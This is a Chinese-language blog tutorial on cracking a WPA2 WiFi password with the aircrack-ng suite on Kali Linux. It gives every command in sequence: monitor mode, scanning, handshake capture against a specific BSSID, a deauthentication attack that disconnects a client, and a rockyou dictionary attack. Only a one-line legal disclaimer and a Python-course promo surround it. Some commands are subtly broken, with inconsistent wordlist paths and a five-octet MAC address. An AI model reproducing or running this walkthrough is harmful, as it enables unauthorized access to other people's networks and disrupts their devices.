kali linux本身就有字典文件,我們把它解壓出來。

root@kali:~# gzip -d /usr/share/wrodlists/rockyou.txt.gz

這裡我們選用暴力破解。

1.輸入airmon-ng查看是否支持監聽模式

如何暴力破解wifi密碼

從圖中可以看到我的無線網卡wlan0是支持監聽模式的。如果該命令沒有任何輸出則表示沒有可以支持監聽模式的網卡。(airmon-ng也是需要安裝的,裝機的時候應該有。有些可能顯示的是wifi0,但不管怎樣實質都是一樣的,隻是輸入的時候註意下。)

2.開啟無線網卡的監聽模式

如果前面顯示的是wifi0,就把wlan0改為wifi0

root@kali:~# airmon-ng start wlan0
如何暴力破解wifi密碼

大傢這時候再輸入ifconfig,會發現wlan0變為瞭wlan0mon,這表明網卡監聽模式已開啟。

如何暴力破解wifi密碼

3.搜索一下附近的WiFi。

root@kali:~# airodump-ng wlan0mon
如何暴力破解wifi密碼

使用airodump-ng 命令列出無線網卡掃描到的WiFi熱點詳細信息,包括信號強度,加密類型,信道等。這裡我們記下要破解WiFi的BSSID和信道,如圖中我用紅色標記出來的。當搜索到我們想要破解的WiFi熱點時可以 Ctrl+C 停止搜索。

4.抓取握手包
使用網卡的監聽模式抓取周圍的無線網絡數據包,其中我們需要用到的數據包是包含瞭WiFi密碼的握手包,當有新用戶連接WiFi時會發送握手包。

抓包。

root@kali:~# airodump-ng -c 10 --bssid D4:EE:07:12:57:80 -w ~/ wlan0mon

參數解釋:

  • -c 指定信道,上面已經標記目標熱點的信道
  • -bssid指定目標路由器的BSSID,就是上面標記的BSSID
  • -w指定抓取的數據包保存的目錄
如何暴力破解wifi密碼

上面可以看到連接到wifi熱點的設備,我標記出來的是我的平板電腦的MAC地址。

5.強制連接到wifi的設備重連路由器
現在我們使用aireplay-ng命令給平板發送一個反認證包,使平板電腦強制斷開連接,隨後它會自動再次連接wifi。
不難看出,airplay-ng生效的前提是WiFi熱點中必須至少已經接入一個設備。
由於剛剛打開的終端一直在執行抓包工作,所以我們重新打開一個終端,輸入命令。

# aireplay-ng -0 2 -a D4:EE:07:12:57:80 -c AC:CF:85:B6:81 wlan0mon


參數解釋

  • -a指定WiFi熱點的BSSID
  • -c指定要攻擊設備的MAC地址
如何暴力破解wifi密碼

此刻可以看到已經成功抓取到握手包瞭。如下:


如何暴力破解wifi密碼

這個時候使用Ctrl+C命令停止抓包,同時結束無線網卡的監聽模式。
結束監聽:

root@kali:~# airmon-ng stop wlan0mon
如何暴力破解wifi密碼

6 暴力破解
上面已經成功抓取到瞭握手包,現在要做的工作就是將握手包的密碼和字典文件中的密碼進行匹配,我隻是使用瞭一般復雜的全字母密碼,花瞭將近20分鐘破解出密碼。

root@kali:~# aircrack-ng -a2 -b D4:EE:07:12:57:80 -w /usr/share/wordlist/rockyou.txt ~/*.cap
如何暴力破解wifi密碼

可以看到,密碼出來瞭。

PS:私自破解他人wifi密碼是違法的。


最後多說一句,小編是一名python開發工程師,這裡有我自己整理的整套python學習資料和路線,想要這些資料的都可以關註小編,並私信“01”領取。

創作者介紹
創作者 3C王者 的頭像
3C王者宇晨

3C王者

3C王者宇晨 發表在 痞客邦 留言(0) 人氣( 3 )